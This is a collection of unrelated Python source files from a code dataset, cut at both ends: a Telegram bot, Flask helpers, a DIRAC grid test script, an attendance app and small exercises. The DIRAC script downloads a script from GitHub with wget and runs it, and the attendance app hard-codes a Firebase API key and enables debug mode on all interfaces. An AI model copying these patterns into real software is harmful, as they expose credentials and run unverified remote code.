get_phone, data, order, justiva_id)\r\n\r\n def get_phone(msg, data, order, justiva_id):\r\n data.append(msg.text)\r\n\r\n msg = bot.send_message(msg.chat.id, \"Введите свое 📞 телефон:\")\r\n\r\n bot.register_next_step_handler(msg, get_telegram, data, order, justiva_id)\r\n\r\n def get_telegram(msg, data, order, justiva_id):\r\n data.append(msg.text)\r\n\r\n msg = bot.send_message(msg.chat.id, \"Введите свое 📘 телеграмм:\")\r\n\r\n bot.register_next_step_handler(msg, get_whatsup, data, order, justiva_id)\r\n\r\n def get_whatsup(msg, data, order, justiva_id):\r\n data.append(msg.text)\r\n\r\n msg = bot.send_message(msg.chat.id, \"Введите свое 📗 вацап:\")\r\n\r\n bot.register_next_step_handler(msg, get_all, data, order, justiva_id)\r\n\r\n def get_all(msg, data, order, justiva_id):\r\n data.append(msg.text)\r\n\r\n keyboard = 
tb.types.InlineKeyboardMarkup()\r\n send_to_customer = tb.types.InlineKeyboardButton(text=\"Отправить\",\r\n callback_data=f\"send_to_justiva:{justiva_id[0]}\")\r\n\r\n keyboard.add(send_to_customer)\r\n\r\n customer_info = f'{order}--------------------\\n' \\\r\n f'🏙️ Город: {data[0]}\\n👤 Имя: {data[1]}\\n💰 Цена: {data[2]}\\n📞 Телефон: {data[3]}\\n' \\\r\n f'📘 Телеграмм: {data[4]}\\n📗 Вацап: {data[5]}'\r\n\r\n bot.send_message(msg.from_user.id, customer_info, reply_markup=keyboard)\r\n\r\n @bot.callback_query_handler(func=lambda call: 'send_to_justiva' in call.data)\r\n def get_info_to_justiva(call):\r\n print(call.data)\r\n justiva_id = re.findall(r'\\d+', call.data)\r\n bot.send_message(justiva_id[0], call.message.text)\r\n bot.send_message(call.message.chat.id, 'Ваши данные отправлены юристу!')\r\n\r\n return bot\r\n\r\n\r\ndef main():\r\n api_token = \"TOKEN\"\r\n bot = create_bot(api_token)\r\n bot.polling(none_stop=True, interval=0)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"272058158","text":"\"\"\" Model and schema related utilities. \"\"\"\nimport functools, operator, json, re\nfrom flask import request, g\nfrom marshmallow import Schema, fields\nfrom marshmallow.schema import SchemaMeta\nfrom sqlalchemy import and_, or_, not_\nfrom sqlalchemy.orm.query import Query\nfrom sqlalchemy.inspection import inspect\nfrom sqlalchemy.sql.operators import ColumnOperators\n\nfrom app import db\nfrom app.util.core import APIError, camel_to_snake, map_error, getattr_keypath, setitem_keypath\n\nclass Nested(fields.Nested):\n \"\"\" Modified Marshmallow Nested field with flexible nested serialization and deserialization. 
\"\"\"\n def __init__(self, *args, **kwargs):\n # Initialize base class\n super(Nested, self).__init__(*args, **kwargs)\n # Model\n model = self.metadata.get(\"model\")\n if not model:\n raise AttributeError(\"Model parameter must be defined for nested schema field.\")\n # Primary key\n model_mirror = self.model_mirror = inspect(model)\n self.primary_key = getattr(model, model_mirror.primary_key[0].name)\n def _serialize(self, value, attr, obj):\n \"\"\"\n Serialized nested data.\n\n Args:\n value: The value to be serialized.\n attr: The attribute or key on the object to be serialized.\n obj: The object the value was pulled from.\n Returns:\n Serialized value.\n \"\"\"\n many = self.metadata.get(\"many\", False)\n model = self.metadata[\"model\"]\n nested_fields_stack = self.context.get(\"__nested_stack\", None)\n nested_fields = nested_fields_stack[-1] if nested_fields_stack else None\n # No value\n if value==None:\n return value\n # Queryset type check\n if many and not isinstance(value, Query):\n raise TypeError(\"Only queryset can be serialized when many is True.\")\n # Nested field serialization restriction\n if not nested_fields or attr not in nested_fields:\n if many:\n return [item[0] for item in value.with_entities(self.primary_key).all()]\n else:\n return getattr(value, self.primary_key.name)\n # Transfrom query set to iterable data if many is true\n if many and isinstance(value, Query):\n value = value.all()\n # Nested nested fields\n nested_nested_fields = nested_fields[attr]\n if nested_nested_fields:\n nested_fields_stack.append(nested_nested_fields)\n result = super(Nested, self)._serialize(value, attr, obj)\n nested_fields_stack.pop()\n else:\n result = super(Nested, self)._serialize(value, attr, obj)\n # Call base class serialize method\n return result\n def _deserialize(self, value, attr, data):\n \"\"\"\n Find nested data by primary key as deserialize result.\n\n Args:\n value: The value to be deserialized.\n attr: The attribute or key in \"data\" to be deserialized.\n obj: The raw input data.\n Returns:\n Deserialized value.\n \"\"\"\n import sys\n print(value, file=sys.stderr)\n many = self.metadata.get(\"many\", False)\n model = self.metadata[\"model\"]\n # Many\n if many:\n raise NotImplementedError()\n else:\n return value if isinstance(value, model) else get_pk(model, value)\n\ndef load_data(schema, data, load_args={}, **kwargs):\n \"\"\"\n Load data through schema.\n\n Args:\n schema: Schema instance or class used for serialization.\n obj: Data to be deserialized.\n load_args: Arguments for \"load\" method in serialization process.\n Only valid if schema is a class derived from \"Schema\".\n kwargs: Arguments for class constructor if schema is class, or for \"load\" method if schema is instance.\n \"\"\"\n # Schema instance\n if isinstance(schema, Schema):\n load_args = kwargs\n # Schema class\n elif issubclass(schema, Schema):\n schema = schema(**kwargs)\n else:\n raise TypeError(\"'schema' must be a derived class or a instance of Schema class.\")\n # Parse with error handling\n obj, error = schema.load(data, **load_args)\n if error:\n raise APIError(400, \"arg_fmt\", errors=error)\n return obj\n\ndef dump_data(schema, obj, nested=(), nested_user=False, dump_args={}, **kwargs):\n \"\"\"\n Dump data through schema.\n\n Args:\n schema: Schema instance or class used for serialization.\n obj: Model instance to be serialized.\n nested: Nested fields to be serialized.\n nested_user: Serialize nested fields designated by user request.\n dump_args: Arguments for \"dump\" 
method in serialization process.\n Only valid if schema is a class derived from \"Schema\".\n kwargs: Arguments for class constructor if schema is class, or for \"dump\" method if schema is instance.\n \"\"\"\n # Nested serialization field list\n nested = list(nested)\n if nested_user:\n nested += g.json_params.get(\"with\", [])\n # Schema instance\n if isinstance(schema, Schema):\n dump_args = kwargs\n # Schema class\n elif issubclass(schema, Schema):\n schema = schema(**kwargs)\n else:\n raise TypeError(\"'schema' must be a derived class or an instance of Schema class.\")\n # Nested fields\n nested_fields = {}\n for keypath in nested:\n setitem_keypath(nested_fields, keypath, {}, True)\n # Dump with nested schema support\n schema.context[\"__nested_stack\"] = [nested_fields]\n result = schema.dump(obj, **dump_args)[0]\n schema.context[\"__nested_stack\"] = None\n return result\n\ndef get_pk(model, pk, allow_null=False, error=APIError(404, \"not_found\")):\n \"\"\"\n Get element by primary key.\n\n Args:\n model: Model class to operate.\n pk: Primary key of the element.\n allow_null: Return null when nothing is found. Will throw APIError otherwise.\n error: Custom error instance to be thrown when nothing is found.\n Returns:\n Model instance.\n Raises:\n APIError: When nothing is found and allow_null is set to false.\n \"\"\"\n result = model.query.get(pk)\n if not (allow_null or result):\n raise error\n return result\n\ndef get_by(model, allow_null=False, error=APIError(404, \"not_found\"), **kwargs):\n \"\"\"\n Get element by given condition.\n\n Args:\n model: Model class to operate.\n allow_null: Return null when nothing is found. Will throw APIError otherwise.\n error: Custom error instance to be thrown when nothing is found.\n kwargs: Keyword arguments to be passed to filter_by function.\n Returns:\n Model instance.\n Raises:\n APIError: When nothing is found and allow_null is set to false.\n \"\"\"\n result = model.query.filter_by(**kwargs).first()\n if not (allow_null or result):\n raise error\n return result\n\ndef foreign_key(target_model, backref_name):\n \"\"\"\n Define a foreign key relationship.\n\n Args:\n target_model: Name of the target model.\n backref_name: Back reference name on the target model.\n Returns:\n A tuple with a foreign key relationship object and a foreign key ID field.\n \"\"\"\n return (\n db.relationship(target_model, backref=db.backref(backref_name, lazy=\"dynamic\")),\n db.Column(db.Integer(), db.ForeignKey(\"%s.id\" % camel_to_snake(target_model)))\n )\n\ndef many_to_many(source_model, target_model, backref_name):\n \"\"\"\n Define a many-to-many relationship.\n\n Args:\n source_model: Name of the source model.\n target_model: Name of the target model.\n backref_name: Back reference name on the target model.\n Returns:\n A SQLAlchemy many-to-many relationship object.\n \"\"\"\n source_model_snake = camel_to_snake(source_model)\n target_model_snake = camel_to_snake(target_model)\n # Helper table\n helper_table = db.Table(\n \"m2m_%s_%s_%s\" % (source_model, target_model, backref_name),\n db.Column(\"%s_id\" % source_model_snake, db.Integer, db.ForeignKey(\"%s.id\" % source_model_snake)),\n db.Column(\"%s_id\" % target_model_snake, db.Integer, db.ForeignKey(\"%s.id\" % target_model_snake))\n )\n # Many-to-many relationship\n return db.relationship(\n target_model,\n secondary=helper_table,\n backref=db.backref(backref_name, lazy=\"dynamic\"),\n lazy=\"dynamic\"\n )\n\ndef parse_param(schema=None, schema_class=None, target=\"params\", init_args={}, 
load_args={}):\n \"\"\"\n Decorator for checking and parsing request parameters.\n\n Args:\n schema: Schema instances to be used for deserializing.\n schema_class: Schema class to be used for deserializing.\n Can be a class derived from Schema class or a dictionary of class members.\n In the latter class, a class derived from Schema class will be created from given dictionary.\n target: Name of the attribute to be set on request data object (g).\n init_args: Parameters used to initialize a schema instance.\n Only valid when a schema class is passed in.\n load_args: Parameters used to deserialize requests.\n Returns:\n A decorator which does request parameters checking and deserializing before calling decorated view.\n \"\"\"\n # Build schema from schema class\n if schema==None:\n # Build schema class from dictionary\n if isinstance(schema_class, dict):\n schema_class = SchemaMeta(\"ParamSchema\", (Schema,), schema_class)\n # Illegal schema class type\n elif not issubclass(schema_class, Schema):\n raise TypeError(\"schema_class must be a dictionary or derived from Schema class.\")\n schema = schema_class(**init_args)\n # Decorator\n def decorator(func):\n # Save parsed result into target variable\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n setattr(g, target, load_data(schema, request.get_json(), **load_args))\n return func(*args, **kwargs)\n return wrapper\n return decorator\n\n# Comparison filters\n__comp_filters = {\n \"eq\": operator.eq,\n \"ne\": operator.ne,\n \"gt\": operator.gt,\n \"gte\": operator.ge,\n \"lt\": operator.lt,\n \"lte\": operator.le,\n \"contains\": ColumnOperators.contains,\n \"icontains\": lambda column, text: column.ilike(\"%\"+text+\"%\")\n}\n\n# Logical filter\n__logical_filters = {\n \"and\": and_,\n \"or\": or_,\n \"not\": not_\n}\n\ndef __build_filter_exp(query, model):\n \"\"\"\n Recursively build SQLAlchemy filter expression from user-provided query.\n\n Args:\n query: An array whose first element is the name of the filter.\n Subsequent elements in this array are the parameters of this filter.\n Parameters can be a single value or another query array.\n e.g. 
[\"and\", [\"eq\", \"field1\", true], [\"or\", [\"ne\", \"field2\", \"hi\"], [\"gte\", \"field3.nested\", 10]]]\n model: Data model on which fields in the filters can be found.\n Returns:\n A corresponding SQLAlchemy filter expression.\n Raises:\n APIError: When unknown query operator occurs.\n \"\"\"\n # Comparison filters\n comp_builder = __comp_filters.get(query[0])\n if comp_builder:\n field = getattr_keypath(model, query[1])\n return comp_builder(field, query[2])\n # Logical filters\n logical_builder = __logical_filters.get(query[0])\n if logical_builder:\n nested_exp_list = [__build_filter_exp(nested_query, model) for nested_query in query[1:]]\n return logical_builder(*nested_exp_list)\n # Unknown filter\n raise APIError(400, \"unknown_query_oper\", operator=query[0])\n\ndef __filter_handler(query_set, model, params):\n \"\"\"\n Handle user-provided filtering requests.\n\n Args:\n query_set: SQLAlchemy query set to be filtered.\n model: Data model from which given query set is generated.\n params: User-provided filter params, with format {\"query\": [...], ...}.\n For query format see \"__build_filter_exp\" function.\n Returns:\n A query set with user-provided filters applied.\n \"\"\"\n query = params.get(\"query\")\n if query:\n filter_exp = __build_filter_exp(query, model)\n return query_set.filter(filter_exp)\n else:\n return query_set\n\ndef __ordering_handler(query_set, model, params):\n \"\"\"\n Handle ordering requests.\n\n Args:\n query_set: SQLAlchemy query set to be ordered.\n model: Data model from which given query set is generated.\n params: User-provided filter params, with format {\"order\": {\"field1\": , ...}, ...}.\n True indicates ascending order, while False indicates descending order.\n Returns:\n A query set with user-provided ordering applied.\n \"\"\"\n orders = params.get(\"order\")\n if not orders:\n return query_set\n # Ordering\n sqla_params = []\n for (field_keypath, order) in orders:\n field = getattr_keypath(model, field_keypath)\n param = field.asc() if order else field.desc()\n sqla_params.append(param)\n return query_set.order_by(*sqla_params)\n\ndef __pagination_handler(query_set, model, params):\n \"\"\"\n Handle user-provided pagination requests.\n\n Args:\n query_set: SQLAlchemy query set to be paginated.\n model: Data model from which given query set is generated.\n params: User-provided filter params, with format {\"offset\": , \"limit\": , ...}.\n Returns:\n A query set with user-provided pagination applied.\n \"\"\"\n # Offset\n offset = params.get(\"offset\")\n if offset!=None:\n query_set = query_set.offset(offset)\n # Limit\n limit = params.get(\"limit\")\n if limit!=None:\n query_set = query_set.limit(limit)\n return query_set\n\n# User filter handlers\n__user_filters = [\n __filter_handler,\n __pagination_handler,\n __ordering_handler\n]\n\ndef filter_user(query_set, model):\n \"\"\"\n Apply user-provided data filters to given query set.\n\n Args:\n query_set: SQLAlchemy query set to be filtered.\n model: Data model from which given query set is generated.\n Returns:\n A query set with user-provided filters, ordering and pagination applied.\n \"\"\"\n # Handle user filters\n for handler in __user_filters:\n query_set = handler(query_set, model, g.json_params)\n return query_set\n\nclass FileField(fields.Field):\n \"\"\" Schema field for FileDepot file. 
\"\"\"\n def _serialize(self, value, attr, obj):\n return value.path if value else value\n def _deserialize(self, value, attr, data):\n return value\n\ndef get_data():\n \"\"\" Get request data from request object. \"\"\"\n # JSON\n if request.is_json:\n return request.get_json()\n req_data = {}\n # Form\n for key, value in request.form.items():\n req_data[key] = json.loads(value)\n # File\n for key, value in request.files.items():\n req_data[key] = value\n return req_data\n\nunique_msg_rx = re.compile(r\"\\((\\w+)\\)=\\((\\w+)\\)\")\n\ndef handle_prog_error(e):\n \"\"\" Handle PG8000 programming error. \"\"\"\n # Error arguments and numbers\n error_args = e.orig.args\n errno = int(error_args[2])\n # Unique constraint violation\n if errno==23505:\n key, value = unique_msg_rx.search(error_args[4]).groups()\n return APIError(400, \"unique_violation\", key=key, value=value)\n return e\n","sub_path":"app/util/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":15413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"111024802","text":"from MovingAverageStreamer import MovingAverageStreamer\n\nclass HiLoActivator:\n\n def __init__(self, period):\n self.movingAverage = MovingAverageStreamer(period)\n self.period = period\n self.trend = False #False: downtrend; True: uptrend\n self.lastValue = (False, True)\n\n def getInitializationSize(self):\n return self.period + 1\n\n def setup(self, initialData):\n if len(initialData) < self.getInitializationSize():\n raise(ValueError(\"Not enough initialization data.\"))\n\n self.movingAverage.setup(initialData[:-1])\n\n movingAverage = self.movingAverage.lastValue\n lastClose = initialData[len(initialData)-1]\n\n if movingAverage > lastClose:\n trend = True\n reversal = trend != self.trend\n elif movingAverage < lastClose:\n trend = False\n reversal = trend != self.trend\n else:\n trend = self.trend\n reversal = False\n\n self.trend = trend\n self.lastValue = (trend, reversal)\n\n self.movingAverage.onData(lastClose)\n\n def onData(self, data):\n movingAverage = self.movingAverage.lastValue\n lastClose = data\n\n if movingAverage > lastClose:\n trend = True\n reversal = trend != self.trend\n elif movingAverage < lastClose:\n trend = False\n reversal = trend != self.trend\n else:\n trend = self.trend\n reversal = False\n\n self.trend = trend\n self.lastValue = (trend, reversal)\n\n self.movingAverage.onData(data)\n\n return (trend, reversal)\n","sub_path":"generalized_code/HiLoActivator.py","file_name":"HiLoActivator.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"389274098","text":"#!/usr/bin/env python3\n\"\"\"\nMain program for checking the status of dirac01.\nInstalls a fresh UI and submits jobs to a variety of sites\n(HTCondorCE, ARC) using the selected VO. Also tried to replicate\nand register a file.\n\"\"\"\nimport os\nimport sys\nimport install_ui\nimport make_jdls\nimport check_dirac_helpers\n\n\ndef main():\n \"\"\"This is where all the action is. \"\"\"\n print(\"Welcome to the basic dirac test script.\")\n print(\"Please make sure you are using an SL7 compatible machine.\")\n print(\"You will also need a valid user certificate in $HOME/.globus \\n\")\n\n # 0. Sanity checks\n check_dirac_helpers.check_prerequisites()\n\n # 1. 
Setup a UI\n # pick which VO to test, default: gridpp\n print(\"Which VO do you want to test (default: gridpp) ?\")\n user_VO = input(\"Your choices are: gridpp, lz, lsst, solidexperiment.org, skatelescope.eu: \") \\\n or \"gridpp\"\n if user_VO not in [\"gridpp\", \"lz\", \"lsst\", \"solidexperiment.org\", \"skatelescope.eu\"]:\n print(f\"Testing for {user_VO} VO is not supported.\")\n sys.exit(0)\n\n # use cvmfs ui or install local one, default: local\n install_type = input(\"Install new local UI or use cvmfs (default: local)? Please enter: 'local'/'cvmfs': \") \\\n or \"local\"\n if install_type not in [\"local\", \"cvmfs\"]:\n print(f\"WARNING: install_type {install_type} not known, proceeding with local install.\")\n install_type = \"local\"\n\n install_ui.setup_ui(user_VO, install_type)\n\n # 2. Select Sites and make JDLs\n # aiming for good UK coverage, ARC and HTCondor\n sites_to_check = [\"LCG.UKI-LT2-IC-HEP.uk\",\n \"LCG.UKI-LT2-QMUL.uk\",\n \"LCG.UKI-LT2-Brunel.uk\",\n \"LCG.UKI-NORTHGRID-LANCS-HEP.uk\",\n \"LCG.UKI-NORTHGRID-LIV-HEP.uk\",\n \"LCG.UKI-SOUTHGRID-RALPP.uk\"]\n\n if user_VO == \"solidexperiment.org\":\n sites_to_check = [\"LCG.UKI-LT2-IC-HEP.uk\", \"LCG.BEgrid.ULB-VUB.be\"]\n\n if user_VO == \"skatelescope.eu\":\n sites_to_check = [\"LCG.UKI-LT2-IC-HEP.uk\", \"LCG.UKI-NORTHGRID-MAN-HEP.uk\",\n \"LCG.RAL-LCG2.uk\", \"LCG.SARA-MATRIX.nl\"]\n if user_VO == \"lz\":\n sites_to_check.append(\"CLOUD.UKI-LT2-IC-HEP-lz.uk\")\n\n make_jdls.make_jdls(user_VO, sites_to_check)\n\n # 3. Check that dirac test script works locally\n print('Running local test of script to submit: diractest.sh')\n working_dir = os.getcwd()\n testscript = os.path.join(working_dir, \"diractest.sh\")\n test_submitted_script_cmd = [testscript, \"testarg1\", \"testarg2\"]\n check_dirac_helpers.complex_run(test_submitted_script_cmd)\n\n # write job numbers corresponding to sites to a log file\n outfile_name = os.path.join(working_dir, \"sites.log\")\n\n# 6. 
Job Submission\n outfile = open(outfile_name, \"a\", encoding=\"utf-8\")\n\n for site in sites_to_check:\n\n jdlfile = site + \".jdl\"\n print(site)\n\n sub_cmd = [\"dirac-wms-job-submit\", \"-f\", \"jobs.log\", jdlfile]\n outfile.write(f\"Submitting standard job to {site}\\n\")\n command_log = install_ui.complex_run(sub_cmd)\n check_dirac_helpers.jobid_to_file(command_log, outfile)\n\n # now all the special cases (all these sites also receive a standard test job)\n # all special cases run either at RALPP or Imperial\n\n if site == \"LCG.UKI-SOUTHGRID-RALPP.uk\":\n print(f\"Submitting multicore job for {user_VO} VO to {site}\")\n outfile.write(f\"Submitting multicore job for {user_VO} VO to {site}\\n\")\n sub_cmd = [\"dirac-wms-job-submit\", \"-f\",\n \"jobs.log\", \"LCG.UKI-SOUTHGRID-RALPP.uk.multi.jdl\"]\n command_log = install_ui.complex_run(sub_cmd)\n check_dirac_helpers.jobid_to_file(command_log, outfile)\n\n if site == \"LCG.UKI-LT2-IC-HEP.uk\":\n print(f\"Submitting multicore job for {user_VO} VO to {site}\")\n outfile.write(f\"Submitting multicore job for {user_VO} VO to {site}\\n\")\n sub_cmd = [\"dirac-wms-job-submit\", \"-f\",\n \"jobs.log\", \"LCG.UKI-LT2-IC-HEP.uk.multi.jdl\"]\n command_log = install_ui.complex_run(sub_cmd)\n check_dirac_helpers.jobid_to_file(command_log, outfile)\n\n print(f\"Submitting EL7 job for {user_VO} VO to {site}\")\n outfile.write(f\"Submitting EL7 job for {user_VO} VO to {site}\\n\")\n sub_cmd = [\"dirac-wms-job-submit\", \"-f\",\n \"jobs.log\", \"LCG.UKI-LT2-IC-HEP.uk.el7.jdl\"]\n command_log = install_ui.complex_run(sub_cmd)\n check_dirac_helpers.jobid_to_file(command_log, outfile)\n\n print(f\"Submitting job requiring InputData for {user_VO} VO to {site}\\n\")\n outfile.write(f\"Submitting job requiring InputData for {user_VO} VO to {site}\\n\")\n sub_cmd = [\"dirac-wms-job-submit\", \"-f\",\n \"jobs.log\", \"LCG.UKI-LT2-IC-HEP.uk.inputdata.jdl\"]\n command_log = install_ui.complex_run(sub_cmd)\n check_dirac_helpers.jobid_to_file(command_log, outfile)\n\n print(f\"Submitting tag (GPU) job for {user_VO} VO to {site}\")\n outfile.write(f\"Submitting tag (GPU) job for {user_VO} VO to {site}\\n\")\n sub_cmd = [\"dirac-wms-job-submit\", \"-f\",\n \"jobs.log\", \"LCG.UKI-LT2-IC-HEP.uk.tag.jdl\"]\n command_log = install_ui.complex_run(sub_cmd)\n check_dirac_helpers.jobid_to_file(command_log, outfile)\n\n\n outfile.close()\n\n # test API submission (currently basic implemetation only)\n wget_cmd_api = [\"wget\", \"-np\", \"-O\", \"testapi.py\",\n \"https://raw.githubusercontent.com/ic-hep/DIRAC-tools/master/check_dirac/grid_and_cloud_api_test.py\"]\n install_ui.simple_run(wget_cmd_api)\n os.chmod(\"testapi.py\", 0o744)\n wget_cmd_aux = [\"wget\", \"-np\", \"https://raw.githubusercontent.com/ic-hep/DIRAC-tools/master/user/testapi.sh\"]\n install_ui.simple_run(wget_cmd_aux)\n sub_cmd_api = [\"./testapi.py\", user_VO]\n install_ui.simple_run(sub_cmd_api)\n\n # 7. Datamanagement: Test replicate and register (using FTS) function\n check_dirac_helpers.simple_run([os.path.join(working_dir, \"repandreg.sh\")])\n\n # 8. 
Closing statement\n print('\\nTo check on the status of the test jobs, please do:')\n print('cd '+ working_dir)\n\n if os.path.isfile('bashrc'):\n print('source bashrc')\n elif install_type == \"cvmfs\":\n print('source /cvmfs/dirac.egi.eu/dirac/bashrc_gridpp')\n else:\n print('source diracos/diracosrc')\n print('dirac-wms-job-status -f jobs.log')\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"check_dirac/check_dirac.py","file_name":"check_dirac.py","file_ext":"py","file_size_in_byte":6259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"368393296","text":"from flask import Flask, redirect,url_for,request,render_template\nimport pyrebase\n\n\nconfig = {\n \"apiKey\": \"AIzaSyAT4CknPPpJmPb8kT_DOgLcLG1a1eeUshY\",\n \"authDomain\": \"attendance-app-3dbd3.firebaseapp.com\",\n \"databaseURL\": \"https://attendance-app-3dbd3.firebaseio.com/\",\n \"storageBucket\": \"attendance-app-3dbd3.appspot.com\",\n }\nfirebase = pyrebase.initialize_app(config)\ndb = firebase.database()\n\n\napp = Flask(__name__)\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n@app.route('/attendance', methods=['POST'])\ndef attendance():\n from datetime import datetime\n if request.method == 'POST':\n name = request.form['name']\n email = request.form['email']\n empid = request.form['empID']\n now = datetime.now()\n time = now.strftime(\"%H:%M:%S\")\n \n data = { \"name\": name, \"email\" : email, \"empID\" : empid, \"time\" : time}\n\n db.child(\"users\").push(data)\n return render_template('result.html', name=name, email=email, empid=empid, time=time)\n\n \nif __name__ == '__main__':\n app.run(host='0.0.0.0',debug=True, port=8080)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"233097649","text":"from bs4 import BeautifulSoup\n\nwith open(\"index.html\") as fp:\n soup = BeautifulSoup(fp,'lxml')\n\nprint(soup.text)\n\nprint(soup.text.split())\n\n# Mở file\nfile = open(\"plc.txt\", \"wt\")\nfile.write(soup.text)\n\n# Đóng file\nfile.close()\n\n","sub_path":"Week1/demo2.py","file_name":"demo2.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"595762068","text":"from student import Student #If you are importing the class here directly you dont need to write the modulename.classname\n#from modulename import classname/function/variable\nstudents = []\n\ndef main_menu():\n\tprint(\"1. Add student\")\n\tprint(\"2. Delete student\")\n\tprint(\"3. Search Student\")\n\tprint(\"4. Display all student\")\n\tprint(\"5. Change a student name in the list\") \n\tprint(\"6. Manage All groups\")\n\tprint(\"7. 
exit\")\n\n\nwhile True:\n\tmain_menu()\n\tch = int(input(\"Enter your choice\"))\n\tif ch == 1:\n\t\t#Add student\n\t\tst_id = input(\"\\tEnter student id : \")\n\t\tname = input(\"\\tEnter name : \")\n\t\tage = input(\"\\tEnter student age : \")\n\t\tgrade = input(\"\\tEnter grade : \")\n\n\t\tst_temp = Student(st_id,name,age,grade)\n\t\tstudents.append(st_temp)\n\n\telif ch == 2:\n\t\t#Delete student\n\t\tpass\n\telif ch == 3:\n\t\t#Search student\n\t\tname = input(\"Enter name :\")\n\t\tst = list(filter(lambda a: a.name == name , students))\n\t\tif len(st) == 0: #not st #st\n\t\t\tprint(\"No student found\")\n\t\telse:\n\t\t\tfor i in st:\n\t\t\t\tprint(f\"{i.name}\")\n\t\t#grade = input(\"Enter grade :\")\n\t\t#st = list(filter(lambda a: a.grade == grade ,students))\n\t\t#for i in st:\n\t\t#\tprint(f\"{i.name}\")\n\telif ch == 4:\n\t\t#Display student\n\t\tfor i in students:\n\t\t\tprint(f\"{i.name} | {i.age} | {i.grade} \")\n\telif ch== 5:\n\t\t#Change a student name in the list\n\t\tst_id = input(\"Enter Student id: \")\n\t\tst_temp = list(filter(lambda a: a.st_id == st_id,students))\n\t\tst_temp[0].set_name(input(\"Enter new name: \"))\n\telif ch == 6:\n\t\t#Manage team\n\t\tpass\n\telif ch == 7:\n\t\t#Exit\n\t\tbreak;\n\telse:\n\t\tprint(\"Invalid Choice\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"docs_and_codes/DayWiseFiles_ppt/17AugDay17/learn_python/OOPs/student_project/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"372514707","text":"\"\"\"\nAUTHOR :Robin Singh\nIMPLEMENTAION OF BINARY SEARCH\nIt Uses Divide And Conquer Approch,Binary search works on sorted arrays\nBinary search begins by comparing an element in the middle of the array with the target value,\nIf the target value matches the element, its position in the array is returned,\nIf the target value is less than the element, the search continues in the lower half of the array,\nIf the target value is greater than the element, the search continues in the upper half of the array\nComplexity : O(Logn)\n\n\n\"\"\"\ndef Binary_search(A,key,low,high):\n if low > high:\n print(\"Not Present\")\n else:\n m = (low+high)//2\n if key == A[m]:\n print(\"Element is Present at index\",m)\n elif key < A[m]:\n return Binary_search(A,key,low,m-1)\n else:\n return Binary_search(A,key,m+1,high)\n\n\nA = []\nwhile(1):\n print(\"\\n1.Insert\\t2.Search\\t3.Exit\\t4.Dispaly\\n\")\n ch = int(input(\"Entre Choice\"))\n if ch == 3:\n break\n elif ch ==1:\n n = int(input(\"Entre Number in ASSENDING ORDER\"))\n A.append(n)\n\n elif ch ==2:\n search = int(input(\"Enter Number to be searched\"))\n Binary_search(A,search,0,len(A))\n\n elif ch == 4:\n for i in range(0,len(A)):\n print(A[i],end=\" \")\n\n else:\n print(\"Invalid Option\")\n\n\n\n\n\n\n\n\n\n","sub_path":"Algorithms/Divide _And _Conquer/Binary_Search.py","file_name":"Binary_Search.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"622290265","text":"# session的简单使用\n\n# from requests import Session\n#\n# # 建立 session 对象\n# session = Session()\n#\n# # 设置 cookies\n# session.get('http://httpbin.org/cookies/set/sessioncookie/123456789')\n#\n# # 获取 cookies\n# response = session.get(\"http://httpbin.org/cookies\")\n#\n# print(\"Response Body\".center(40, \"-\"))\n# print(response.text)\n#\n# print(\"Response Headers\".center(40, \"-\"))\n# 
print(response.headers)\n\n\n# custom Request对象\nfrom requests import Session, Request\n\nURL_IP = \"https://httpbin.org/ip\"\nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) '\n 'AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/69.0.3497.100 Safari/537.36'}\n\ns = Session()\n\nreq = Request(\"GET\",\n url=URL_IP,\n headers=headers)\nprepped = req.prepare()\n\nresp = s.send(prepped,\n # stream=stream,\n # verify=verify,\n # proxies=proxies,\n # cert=cert,\n timeout=10\n )\n\nprint(resp.status_code)\n\nprint(resp.text)\n\nprint(resp.request)\n\nprint(resp.request.headers)\n\n\n\n\n\n\n\n","sub_path":"requests_review/requests_play.py","file_name":"requests_play.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"432695649","text":"import asyncio\nimport json\n\nfrom .handlers import dispatch_message\n\n@asyncio.coroutine\ndef send_error(writer, reason):\n message = {\n 'type': 'error',\n 'payload': reason\n }\n payload = json.dumps(message).encode('utf-8')\n writer.write(payload)\n yield from writer.drain()\n\n\n@asyncio.coroutine\ndef handle_message(reader, writer):\n data = yield from reader.read()\n address = writer.get_extra_info('peername')\n\n print('Received message from %s' % address)\n\n try:\n message = json.loads(data.decode('utf-8'))\n except ValueError as e:\n print('Invalid message received')\n yield from send_error(writer, str(e))\n return\n\n try:\n response = yield from dispatch_message(message)\n payload = json.dumps(response).encode('utf-8')\n writer.write(payload)\n yield from writer.drain()\n writer.write_eof()\n except ValueError as e:\n print('Cannot process the message. 
